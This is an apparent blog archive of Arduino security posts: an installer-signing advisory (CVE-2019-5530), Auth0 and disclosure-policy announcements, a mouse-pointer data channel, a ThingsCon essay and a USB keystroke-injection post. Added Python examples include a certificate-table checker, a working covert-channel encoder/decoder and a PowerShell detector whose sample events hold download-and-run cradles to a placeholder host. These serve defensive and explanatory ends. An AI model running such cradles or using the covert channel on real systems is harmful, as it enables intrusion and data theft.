Planet Arduino

Archive for the ‘Security’ Category

Arduino Create Agent is a plug-in that was designed to help Arduino users connect their devices to the Arduino Create platform. The plug-in lets your browser communicate with your device’s serial port from a web application.  

We chose Bitrock’s InstallBuilder, a powerful and easy to use cross-platform installer creation tool, for generating the Arduino Create Agent installers (Windows, macOS, Linux). Those binaries are then served through our global CDN.

Yesterday, Bitrock published an important security advisory stating that Windows binaries generated with InstallBuilder versions earlier than 19.7.0 are vulnerable to tampering even when they carry a valid Authenticode signature. A specially crafted payload can be appended to an existing installer so that the installer's initialization code is tricked into executing code contained in that payload, while the existing signature remains valid.

The issue, originally reported to Bitrock by Youfu Zhang of Chaitin Security Research Lab (@ChaitinTech), was addressed by releasing an updated version of InstallBuilder so that all their customers could rebuild and re-release their installers. CVE-2019-5530 has been assigned to this issue (CVSSv3 score of 6.7).

Once we were notified, and given the potential impact of this security issue, we worked around the clock to rebuild and re-release the Agent's Windows installer. Version 1.1.89 has now been released through our official channels.

Please note that all versions of the Windows installer before version 1.1.89 are vulnerable to CVE-2019-5530.

Because this issue can be exploited against existing, already-released binaries, and a valid signature on its own therefore does not prove that an installer is untampered, we also want to remind all of you to download installers only from official sources.
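The advisory summarised above does not spell out how InstallBuilder's initialization code locates the appended payload, so the following is the generic check rather than a description of CVE-2019-5530. The best-known way appended data survives Authenticode verification is that the Authenticode hash excludes the attribute certificate table, so bytes tucked inside that table after the real PKCS#7 blob (with the table's size fields grown to cover them) do not change the hash; Microsoft's optional EnableCertPaddingCheck setting from MS13-098 is the Windows-side mitigation for that. The script below is an added example, not Arduino's or Bitrock's code: it parses the PE headers, walks the certificate table and reports data that is not covered by the signature. The three installer images it inspects are constructed inline (a header-only PE32+ with a stand-in PKCS#7 blob), not real Arduino Create Agent binaries; point `audit_cert_table` at the bytes of a downloaded installer to use it for real.

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4          # data-directory slot holding the Authenticode cert table
WIN_CERT_HEADER = struct.Struct("<IHH")     # dwLength, wRevision, wCertificateType
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def security_directory(pe: bytes):
    """Return (file offset, size) of the attribute certificate table from the PE headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt_off = e_lfanew + 4 + 20                      # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt_off)[0]
    dir_base = {0x10B: 96, 0x20B: 112}.get(magic)    # PE32 vs PE32+: where the data directories start
    if dir_base is None:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    entry = opt_off + dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    return struct.unpack_from("<II", pe, entry)      # this entry is a file offset, not an RVA


def der_total_length(blob: bytes) -> int:
    """Length (tag + length bytes + content) of the outer DER SEQUENCE at the start of blob."""
    if len(blob) < 2 or blob[0] != 0x30:
        raise ValueError("PKCS#7 blob does not start with a DER SEQUENCE")
    first = blob[1]
    if first < 0x80:
        return 2 + first
    n = first & 0x7F
    if n == 0 or n > 4 or len(blob) < 2 + n:
        raise ValueError("bad DER length encoding")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def audit_cert_table(pe: bytes):
    """Findings about the certificate table; an empty list means nothing suspicious was seen."""
    findings = []
    off, size = security_directory(pe)
    if size == 0:
        return ["no certificate table: file is not Authenticode-signed"]
    end = off + size
    if end > len(pe):
        return ["certificate table extends beyond end of file"]
    if end != len(pe):
        # signtool places the table last; trailing bytes are outside the normal layout
        findings.append(f"{len(pe) - end} bytes after the certificate table")
    pos = off
    while pos < end:
        if end - pos < WIN_CERT_HEADER.size:
            findings.append("truncated WIN_CERTIFICATE header")
            break
        length, _revision, ctype = WIN_CERT_HEADER.unpack_from(pe, pos)
        if length < WIN_CERT_HEADER.size or pos + length > end:
            findings.append("WIN_CERTIFICATE dwLength out of range")
            break
        body = pe[pos + WIN_CERT_HEADER.size:pos + length]
        if ctype != WIN_CERT_TYPE_PKCS_SIGNED_DATA:
            findings.append(f"unexpected certificate type 0x{ctype:04x}")
        else:
            try:
                slack = len(body) - der_total_length(body)
            except ValueError as exc:
                findings.append(str(exc))
            else:
                if slack > 7:   # more than 8-byte alignment padding: data the signature does not cover
                    findings.append(f"{slack} unsigned bytes inside the certificate table")
        pos += (length + 7) & ~7                    # entries are 8-byte aligned
    return findings


def win_certificate(pkcs7: bytes, hidden: bytes = b"") -> bytes:
    """WIN_CERTIFICATE entry; `hidden` models data tucked in after the real PKCS#7 blob."""
    body = pkcs7 + hidden
    length = WIN_CERT_HEADER.size + len(body)
    padded = (length + 7) & ~7
    return WIN_CERT_HEADER.pack(length, 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + body + b"\0" * (padded - length)


def build_installer(cert_table: bytes) -> bytes:
    """Constructed minimal PE32+ image: headers only, certificate table at file offset 512."""
    cert_offset = 512
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                        # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, cert_offset, len(cert_table))
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt)).ljust(cert_offset, b"\0")
    return headers + cert_table


FAKE_PKCS7 = b"\x30\x16" + b"\x00" * 22          # constructed stand-in for a PKCS#7 SignedData blob
PAYLOAD = b"MALICIOUS-INSTALLER-STAGE" + b"\0" * 39   # constructed 64-byte payload

GOOD_INSTALLER = build_installer(win_certificate(FAKE_PKCS7))
# Payload hidden inside the table, dwLength and directory size grown to cover it: hash unchanged.
TAMPERED_INSTALLER = build_installer(win_certificate(FAKE_PKCS7, hidden=PAYLOAD))
# Payload simply appended past the table: the Authenticode hash is specified to cover these bytes.
APPENDED_INSTALLER = build_installer(win_certificate(FAKE_PKCS7)) + PAYLOAD

if __name__ == "__main__":
    for name, image in [("good", GOOD_INSTALLER), ("tampered", TAMPERED_INSTALLER), ("appended", APPENDED_INSTALLER)]:
        print(name, audit_cert_table(image) or "clean")
```

The tampered image passes the naive "is the certificate table the last thing in the file" test and only the slack check catches it, which is why the check compares the DER length of the PKCS#7 blob with the space the table claims for it. Run it alongside, not instead of, a real signature verification (signtool verify or Get-AuthenticodeSignature); it tells you whether unsigned bytes are present, not whether the signer is who you expect.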

If you have any questions regarding this security issue, or if you need any help with upgrading your installer, please do not hesitate to contact Arduino Support through e-mail at support@arduino.cc.

We are excited to announce that we’ve selected Auth0 as the identity management platform of choice for Arduino. We will replace our own Single Sign On solution with Auth0 for all public facing web properties, including Arduino Create and other apps.

We discovered that our own homegrown authentication solution would not scale to meet the rapidly developing needs of the growing global community and decided to reach out to Auth0. In addition to Single Sign On, Arduino will take advantage of Auth0’s new Universal Login, which enables developers to completely customise their branded authentication experiences quickly, and Device Flow for browserless or input-constrained devices.

“We wanted a robust platform to replace our SSO solution but also give us the flexibility to do cool, new things in the device authentication space. Auth0 is a brand we admire, and their API-based approach makes it easy to migrate our login data in a way that’s completely transparent for the customer. We are excited to welcome them to our global community.” – Gianluca Varisco, Arduino CISO

We plan to leverage the power of both communities and events, and explore a technical partnership in the IoT domain. Auth0 currently secures more than 2.5 billion logins per month for 21 million users.

“I have been using Arduino for years as the brain for my personal projects, so working with them in a business capacity is really rewarding. When you empower the developer with simple, powerful tools, the whole business benefits. We are excited by the reach of the Arduino community and aligned in our mission to help the developer in their journey to innovate.” – Eugenio Pace, Auth0 CEO and co-founder 

A little less than a month ago, I joined Arduino as their Chief Information Security Officer. I’ve been in touch with the team for the past couple of months and feel incredibly lucky to be part of such a talented and driven group of people.

We're working hard on developing a robust, well-rounded security program that fits our organisation and are busy improving our security posture across all departments. I am a true believer that it all starts with introducing a strong culture of security awareness, where employees feel confident and empowered to take action against security issues.

Today, I’m thrilled to announce the first release of Arduino’s Coordinated Vulnerability Disclosure (CVD) Policy.

We used some great references when putting it together and we'd like to give them a shout out here: HackerOne's VDP guidelines, CEPS' report on "Software Vulnerability Disclosure in Europe," and the US DoJ Cyber Security unit's VDP framework. We also took into consideration recent Senate testimony of experts in vulnerability disclosure on the role hackers can play in strengthening security, Dropbox's announcement on protecting researchers and 18F's own policy. I also want to publicly thank Amit Elazari Bar On, a doctoral law candidate (J.S.D.) at UC Berkeley School of Law and a Lecturer in the UC Berkeley School of Information Master in Cybersecurity program, for her useful advice and for providing the amazing "#legalbugbounty" standardisation project.

We're also happy to announce that all of the text in our policy is a freely copyable template. We've done this because we'd like to see others take a similar approach. We've put some effort into this across our teams and if you like what you see, please use it. Similarly, if you have improvements to suggest, we'd love to hear from you.

What is CVD?

Coordinated vulnerability disclosure (CVD) is a process aimed at mitigating/eradicating the potential negative impacts of vulnerabilities. It can be defined as “the process of gathering information from vulnerability finders, coordinating the sharing of that information between relevant stakeholders, and disclosing the existence of vulnerabilities and their mitigation to various stakeholders, including the public.”

Figure 1: Relationships among actors in the CVD process. Source: “The CERT Guide to Coordinated Vulnerability Disclosure,” Software Engineering Institute, Carnegie Mellon University

Why is it important for us?

At Arduino, we consider the security of our systems and products a top priority. No technology is perfect, and Arduino believes that working with skilled security researchers across the globe is crucial in identifying weaknesses in any technology. We want security researchers to feel comfortable reporting vulnerabilities they’ve discovered, as set out in this policy, so that we can fix them and keep our information safe.

If you believe you’ve found a security issue in our products or services, we encourage you to notify us. We welcome working with you to resolve the issue promptly.

This policy describes how to send us vulnerability reports and how long we ask security researchers to wait before publicly disclosing vulnerabilities.

Where can I find it?

A copy of the policy is published on our Vulnerability Disclosure Policy page. The official document lives in GitHub. If you would like to comment or suggest a change to the policy, please open a GitHub issue.

Thank you for helping keep Arduino and our users safe!

— Gianluca Varisco

University of Birmingham researchers found two vulnerabilities that allow hackers to gain entry to almost all VW vehicles manufactured after 1995. A team of researchers were able to unlock and start the ignition of Volkswagen cars with just $40 of electronic components.

Read more on MAKE

The post Volkswagen Security Problems: Arduino Hack Reveals RFID Vulnerability appeared first on Make: DIY Projects and Ideas for Makers.

[Ido Gendel] was thinking about new and interesting ways to send data between devices, when he realized that the answer was right in his hand. Literally: he decided to try sending data using the mouse pointer. What he came up with was an interesting hack that uses small movements of the mouse pointer to send data at up to 1200bps, or about 150 bytes per second.

The way he did this was very, very clever. He used an Arduino Leonardo set to emulate a mouse, working alongside his existing mouse. This setup means he can keep using his existing mouse: the system just sees the Arduino as a second mouse, and the pointer only looks a little jerky when you zoom in. That is because the Arduino sends tiny movements, each of which is a code representing a nybble (4 bits) of data. Each code is a combination of three left-right movements or three up-down movements, so two axes times eight step patterns gives 16 distinct movements, each encoding 4 bits. Each encoding movement also returns the mouse to its origin point, so the pointer doesn't mysteriously drift off the screen while data is being sent.

The encoding scheme used by [Ido].
On the computer, a custom program detects and decodes this movement, recreating the stream of data. In his example, this is data from a photoresistor, but it could be anything from random data to the contents of a secret file.

Of course, this isn’t a practical way of sending secret data: it only works when the custom program is active, 150 bytes per second is rather slow and enabling mouse acceleration in Windows stops it working because it masks the small movement. But it is an awesome hack that shows how you can send data in ways that you might not first think of. When you are trying to make a device as simple as possible, this is an important lesson to learn.
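To make the channel concrete, here is an added example (not [Ido]'s Arduino sketch or his decoder, whose exact step patterns are only shown in his figure) that implements one encoding consistent with the description above: a nybble's high bit picks the axis, its low three bits give the direction of three unit steps, and a fourth move brings the pointer back to the origin. The decoder works on a list of relative mouse events (dx, dy) as an operating system would deliver them, and resynchronises past ordinary mouse use by sliding one event at a time until a frame decodes. The step layout, the 4-event framing and the sample messages are assumptions for this example.

```python
from typing import List, Optional, Tuple

Move = Tuple[int, int]           # (dx, dy) relative mouse event
AXIS_LR, AXIS_UD = 0, 1


def encode_nybble(n: int) -> List[Move]:
    """Three unit steps on one axis (bit set = positive direction) plus one move back to the origin."""
    axis = AXIS_UD if n & 0x8 else AXIS_LR
    steps: List[Move] = []
    for bit in (2, 1, 0):
        d = 1 if (n >> bit) & 1 else -1
        steps.append((d, 0) if axis == AXIS_LR else (0, d))
    dx = sum(s[0] for s in steps)
    dy = sum(s[1] for s in steps)
    steps.append((-dx, -dy))     # return move: net displacement of every frame is zero
    return steps


def encode_bytes(data: bytes) -> List[Move]:
    """High nybble first, then low nybble, for each byte."""
    moves: List[Move] = []
    for b in data:
        moves += encode_nybble(b >> 4)
        moves += encode_nybble(b & 0xF)
    return moves


def decode_frame(frame: List[Move]) -> Optional[int]:
    """Nybble carried by four events, or None if they are not a channel frame."""
    if len(frame) != 4:
        return None
    a, b, c, back = frame
    if all(dy == 0 and dx in (1, -1) for dx, dy in (a, b, c)):
        axis, signs = AXIS_LR, [dx for dx, _ in (a, b, c)]
    elif all(dx == 0 and dy in (1, -1) for dx, dy in (a, b, c)):
        axis, signs = AXIS_UD, [dy for _, dy in (a, b, c)]
    else:
        return None
    if back != (-sum(s[0] for s in (a, b, c)), -sum(s[1] for s in (a, b, c))):
        return None              # did not return to origin: not one of our frames
    n = 0
    for s in signs:
        n = (n << 1) | (1 if s == 1 else 0)
    return n | (0x8 if axis == AXIS_UD else 0)


def decode_moves(moves: List[Move]) -> bytes:
    """Recover the byte stream from a mixed event log; unrelated events are skipped one at a time."""
    nybbles: List[int] = []
    i = 0
    while i + 4 <= len(moves):
        n = decode_frame(moves[i:i + 4])
        if n is None:
            i += 1               # ordinary mouse use or misalignment: slide and retry
            continue
        nybbles.append(n)
        i += 4
    out = bytearray()
    for hi, lo in zip(nybbles[0::2], nybbles[1::2]):
        out.append((hi << 4) | lo)
    return bytes(out)


if __name__ == "__main__":
    # Constructed scenario: a user nudge, then the channel carrying a photoresistor reading.
    log = [(37, -12)] + encode_bytes(b"lux=0412") + [(-5, 9)]
    print(decode_moves(log))
```

Each byte costs eight events, so at 1200 events per second this gives the 150 bytes per second quoted above. Sliding resynchronisation is deliberately naive: a human ±1-pixel nudge next to the real frames can produce a false nybble, which is why a real exfiltration tool would add timing gaps or a preamble, and why a defender looking at raw HID events should treat runs of exactly ±1 movements that sum to zero as a signal rather than noise.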


Filed under: Arduino Hacks, peripherals hacks

All photos taken by space150.

Use an Apple Watch to automagically open doors at home or at work with a tap on your wrist.

Read more on MAKE

The post Make an Apple Watch Door Unlocker appeared first on Make: DIY Projects, How-Tos, Electronics, Crafts and Ideas for Makers.

Jun 03

Secure and Track Your Bike with this Arduino-Based GPS Lock

arduino, bicycle, bike, bike lock, lock, Security, Transportation

Riding a bike can be fun, great exercise, and, if you live in a city conducive to it, a great mode of transportation. According to author Scott Bennett who lives in Vancouver BC, Canada, a city with a high bike theft rate, he “wanted to have some peace of mind […]

Read more on MAKE

The post Secure and Track Your Bike with this Arduino-Based GPS Lock appeared first on Make:.

May 13

Casa Jasmina and Bruce Sterling at Thingscon 2015

arduino, bruce sterling, CasaJasmina, Featured, iot, privacy, Security, Thingscon


Bruce Sterling went to Thingscon conference with a keynote about Casa Jasmina and then published the following essay.

—————-

This is the third of my Casa Jasmina essays. It’s about the recent “ThingsCon” conference in Berlin, May 2015.

This remarkable event was the second “ThingsCon,” a new gathering which makes itself useful to the European hardware startup scene, especially “connected products” designers and builders from Berlin and London. “ThingsCon” took place in Berlin’s “Culture Brewery,” which is a huge, defunct beer factory, currently re-zoned for theaters, bars, restaurants and design retail.

Anybody who has seen the Garrone Foundry (which houses Toolbox Co-Working, Fab Lab Torino and Casa Jasmina), would surely recognize the “Culture Brewery.” It’s the same European story: the old industrial hulk remade for today’s culture-industry. So we found the ThingsCon venue to be pretty cozy, even though the stairs are of odd sizes, the huge, lofty rooms don’t fit together properly, the events and workshops are on different floors and mysteriously distant from one another, and there was excellent beer everywhere and tiny, crooked bathrooms stuck nowhere in particular. There’s something fun about this steampunk disorganization — if you’ve built a weird open-source Internet-of-Things device out of glued plywood and steel rods, it really fits that atmosphere.

ThingsCon is not a Maker Faire for the general public, and attending it is not cheap. ThingsCon is aimed at designers, developers, engineers, entrepreneurs and similar stakeholder-types from the technology ecosystem. The presentations were full of practical wisdom about commercial tech-product development: scaring up funding money, allocating time and resources, packaging, promotion, marketing, founder exit-strategies, angel investment, the issues common to people who might like to sit down for a serious talk with, say, Intel.

The organizers of ThingsCon are Peter Bihr, Simon Hoher, Emanuel Schwarz, Max Kruger, Sonja Heinen, Alexandra Deschamps-Sonsino, Brady Forrest, Louisa Heinrich, and Marcel Schouwenaar. As conference organizers go, they won’t win any prizes for sleek efficiency. However when it comes to the Internet of Things, these activists know plenty. At ThingsCon you can learn a lot in a hurry.

So: now that we understand what ThingsCon is about and who ThingsCon is meant to please, let’s confront some of their native ThingsCon problems, because they have lots of interesting issues.

The guy who delivered the first ThingsCon opening keynote, Warren Ellis, really understands their pains. Warren Ellis is pretty well known as a comic book writer, film scriptwriter and novelist, but he was also in the brain-trust of BERG, the legendary and now-dead London interaction-design firm. Warren Ellis grasps the many thorny difficulties of modern connected-product design.

Ellis delivered a sardonically funny rant, warning designers, engineers and manufacturers about the fierce wrath of genuine consumers. Consumers — (they’re the people who are supposed to buy Internet-of-Things products) — are a fickle and treacherous group. Consumers are never grateful for the hard work of designers and technicians. On the contrary, consumers are suspicious, endlessly demanding of customer support, and they resent most things they buy. The Internet-of-Things is even worse than traditional consumer capitalism, because interactive products don’t just sit there, they are invasive and intimate. People treasure their homes as a safe space in a harsh, competitive world, and they feel emotionally wounded when anything in their house betrays them.

Warren Ellis is an intelligent and erudite man, and he was telling the crowd the truth, but they were all laughing nervously because they can’t really believe what he says. It’s all true, but it’s important to understand this and still have some courage about it. If you invent and manufacture something, and it’s a commercial success and ten million people buy the product, of course your life is going to change. You won’t be a “Maker” alone in a garage any more, you’ll be an Internet multimillionaire with customer-support issues. Warren Ellis is right to urge people to think these things through: you shouldn’t dabble in technology and business unless you’re ready to face the consequences of getting what you want.

Barriers to entry in manufacturing are collapsing, so the old lines between a do-it-yourself Maker and a commercial industrialist are blurring. But this doesn’t solve old problems, it just creates interesting new ones. This was the lesson conveyed by Tina Aspiala. Before ThingsCon 2015, I had never heard of Tina Aspiala. Thanks to ThingsCon, I will pay attention to Tina Aspiala from now on.

Tina, who achieved some success with a product of hers, has become a Kickstarter patroness. Tina Aspiala spends a lot of time on Kickstarter and likes to give people some crowdfunding money just to see what happens. She told the crowd that results were mixed. Kickstarter is a funding platform, but some people on Kickstarter are crooks, they’re Kickstarter embezzlers. Other people want to be honest, but they flee in terror when they realize what the real world expects from real design and manufacturing. Others just have bad luck with their Kickstarter: they really wanted to do the work, but they broke a leg, or Dad died, or there was a divorce… that mishap wouldn’t stop FIAT or General Electric, but it does stop the Kickstarter team because they are few in number, while FIAT and General Electric have thousands of personnel.

Many Kickstarter projects get built, despite the host of problems in shipping, supply chains, material costs and manufacturing — but that doesn’t end the story. The product might be workable, but just not much good. The product might do what is promised, but the thing that the product does is only interesting once or twice, not useful in daily life. It’s a “gonzo product” (in the term created by Alexandra Deschamps-Sonsino), because it physically works and it does something, but the thing it does is eccentric and weird, so it has no commercial potential or mass appeal.

Why do we have “gonzo products” nowadays? It’s because (as Tina Aspiala pointed out), cheap electronic components make new combinations easy. Projectors, motors, sensors, cameras, processors and various wireless connectivity chips are all drastically cheaper, so product development becomes like a card game, when any gambler can connect X with Y and add some Z, then hope for a jackpot payoff.

In the case of the Internet of Things, there are many possible inputs — dozens of sensors of all kinds — but very limited outputs, because most IoT gizmos can only do very limited things to get any human attention: they blink, or beep, or vibrate. Blinking, beeping, vibrating things that demand human attention can get pretty annoying. Clearly this is a major IoT problem. Tina Aspiala recommends trying to think this situation through with some design perspective, instead of just hacking more components and attaching them to breadboards with soldering irons. That’s a point of view that makes some sense, though, let’s face it, people are gonna want to do it the easy way.

ThingsCon abounded in talks and workshops, more than I can describe here, but the most interesting thing on offer at Thingscon 2015 was the “IOT Design Manifesto”.  That’s why I’m placing the manifesto here in this post.

A manifesto is a sign of creative health. It’s not that I agree with the “IoT Design Manifesto” — on the contrary, if everybody agrees with a manifesto, then the manifesto is vapid and useless and hasn’t really said anything. Even a manifesto that’s completely wrong can be useful, because it motivates people to rebel and try something else. This manifesto is pretty good, in my opinion, because it’s kindly in tone and well-mannered, it confronts quite a few of the IoT’s real problems.

Even the first declarations, one and two, "We don't believe the hype, we design useful things," single out the ThingsCon crowd as people who are skeptical and yet also trying to get something done. It's a good attitude for a young industry. The other declarations are about participation, security, privacy, data collection, association, personal agency, sustainability and humanity. These are some big, hairy issues which aren't going to get solved in anybody's lifetime. However, if you spend your life with the Internet of Things you're going to be dealing with situations of that kind all the time. So, might as well get used to that prospect now.

The authors of this IoT Manifesto are Andrew Spitz, Ruben van der Vleuten, Marcel Schouwenaar, Harm van Beek, Kevin Verelst, Anner Tiete, Jan Belon, Marcel van Heist and Holly Robbins. Before I went to ThingsCon I’d never heard of any of those people, but they were right to do what they did, and I’ll be watching them with a lot more interest from now on. People tend to grow by the size of their chosen problems. These people have some pretty big problems.

I closed the ThingsCon event by asking the people there to help us with our house.

It’s a bit scary to open the faucet in this way: we don’t know if we’ll get a huge flood, or just a groan in the pipe and some dripping. If we get a lot of interest, Casa Jasmina will be crowded and noisy; if interest is more modest, we’ll try to concentrate on a few core issues. In our Internet-of-Things house, we’ll have to acquire some things, accept some things, build some things and maybe commission some things, too. The project has started deliberately, we have paced ourselves, but as the months pass, Casa Jasmina will slowly become a unique and interesting place, a true place of difference.

I wondered, in starting this project, who would ever really want to stay in such a place, and, having been to ThingsCon, I now have a much better idea about that. ThingsCon had about 300 people attending it — the “new hardware movement” are not a mass movement of millions — but those three hundred people are real people. They are bright and committed, and they really exist. If we understand them as our natural guests and we try to please them, I think we’ll do well.

Bruce Sterling


Jan 27

[Nikhil] has been experimenting with human interface devices (HID) in relation to security. We’ve seen in the past how HID can be exploited using inexpensive equipment. [Nikhil] has built his own simple device to drop malicious files onto target computers using HID technology.

The system runs on a Teensy 3.0. The Teensy is a small Arduino-compatible board whose USB stack can emulate human interface devices such as keyboards. This means you can trick a computer into believing the Teensy is a keyboard. The computer will treat it as such, and the Teensy can enter keystrokes as though a human were typing them, only much faster. You can see how this might be a security problem.

[Nikhil's] device uses a very simple trick to install files on a target machine. It simply opens PowerShell and runs a one-liner command. Generally, this command creates a file based on input received from a web site controlled by the attacker. The script might download a trojan, or it might create a shortcut on the user's desktop which runs a malicious script. The device can also register hot keys that run a specific script every time the user presses that key.

Protecting against this type of attack can be difficult. Your primary option is to strictly control which USB devices may be attached, but that is hard to manage, especially in large organizations. Web filtering also helps in this specific case, since the attack relies on downloading files from the web, and because the injected commands run through PowerShell, logging and constraining PowerShell (script block logging, Constrained Language Mode, application control) gives you both a detection opportunity and a second line of defence. Your best bet may still be to train users not to plug in any old USB device they find lying around. Regardless of the methodology, it's important to know that this stuff is out there in the wild.
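The keystrokes the Teensy types are invisible to the USB layer once they land, but the PowerShell one-liner itself is not: with script block logging enabled, what was typed shows up as event 4104 in the Microsoft-Windows-PowerShell/Operational log. The script below is an added example (not [Nikhil]'s code, and not a description of his exact one-liner) of triaging such events for the "download and run" cradle pattern, including decoding a `-EncodedCommand` argument so the inner command is scanned too. The indicator list, the event shape and the three sample events are constructed for this example; the 10.0.0.5 host is a placeholder.

```python
import base64
import re

# Constructed indicator list: fragments typical of a keystroke-injected download cradle.
CRADLE_INDICATORS = {
    "invoke-expression": r"\biex\b|invoke-expression",
    "download":          r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer",
    "webclient":         r"net\.webclient",
    "start-process":     r"start-process|\bsaps\b",
    "hidden-window":     r"-w(indowstyle)?\s+hidden",
    "encoded-command":   r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
    "no-profile":        r"-nop(rofile)?\b",
    "base64":            r"frombase64string",
}


def decode_encoded_command(text: str) -> str:
    """powershell -EncodedCommand takes base64 of UTF-16LE text; return the inner command or ''."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", text, re.IGNORECASE)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_script(text: str):
    """Sorted names of the indicators found in the script text or in its decoded -enc payload."""
    haystack = text + "\n" + decode_encoded_command(text)
    return sorted(name for name, pat in CRADLE_INDICATORS.items()
                  if re.search(pat, haystack, re.IGNORECASE))


def triage(events, threshold: int = 2):
    """(host, indicators) for script-block events (4104) that reach the threshold."""
    alerts = []
    for ev in events:
        if ev.get("event_id") != 4104:          # 4103 is module logging; only script blocks carry full text
            continue
        hits = score_script(ev["script"])
        if len(hits) >= threshold:
            alerts.append((ev["host"], hits))
    return alerts


def _enc(command: str) -> str:
    """Encode a command the way an attacker would for -EncodedCommand (used to build sample data)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed events, not real telemetry.
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "ws17",
     "script": "Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object"},
    {"event_id": 4104, "host": "ws17",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/p.ps1')"},
    {"event_id": 4104, "host": "ws22",
     "script": "powershell -nop -w hidden -enc " + _enc(
         "(New-Object Net.WebClient).DownloadFile('http://10.0.0.5/t.exe', \"$env:TEMP\\t.exe\"); "
         "Start-Process \"$env:TEMP\\t.exe\"")},
    {"event_id": 4103, "host": "ws22", "script": "Write-Host 'module logging noise'"},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

A threshold of two keeps single legitimate uses of Invoke-WebRequest from paging anyone while still catching both the plain cradle and the encoded one. For a keystroke-injection source specifically, correlate the alert with a USB keyboard arrival (a new HID device in the system log moments before the script block) and with script blocks that were typed far faster than a person could type; neither of those is in this example because the page's post describes the one-liner, not the surrounding telemetry.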


Filed under: Arduino Hacks, security hacks

